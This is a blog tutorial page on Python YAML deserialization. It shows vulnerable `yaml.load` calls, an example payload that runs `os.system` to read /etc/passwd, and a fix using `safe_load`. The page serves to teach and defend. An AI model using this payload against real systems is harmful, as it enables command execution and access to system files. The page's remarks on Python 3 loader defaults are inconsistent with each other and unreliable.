Blog
Blog
Blog
Blog
Welcome to egonzalez blog
Hacking
Index
Hack the box writeups
Python Vulnerabilities
Data Deserialization
Pickle
XML
YAML
Hacking cheatsheet
OpenStack
Index
Docker and DevOps
Index
Powered by GitBook

YAML

Exploitation

The example below is a vulnerable YAML code that can be exploited.

Python 2

import yaml
# Input can be whater text or a file with this content
yaml.load(input)

Python 3

In Python 3, the default loader changed to a safe Loader, and to exploit this vulnerability should be enable UnsafeLoader explicitly. 

import yaml
# Input can be whater text or a file with this content
yaml.load(input, Loader=yaml.UnsafeLoader)

Example payload to exploit this vulnerability in a file sample.yaml os a direct input if allowed.

!!python/object/apply:os.system ["cat /etc/passwd"]

Fix

Fixing this vulnerability is relatively easy.

Replace the usage of yaml.load() function with yaml.safe_load()

In Python 3, yaml.load() uses as default data Loader FullLoader which avoids code execution.

Previous
XML
Next
Hacking cheatsheet
Last updated 1 year ago
Contents
Exploitation
Fix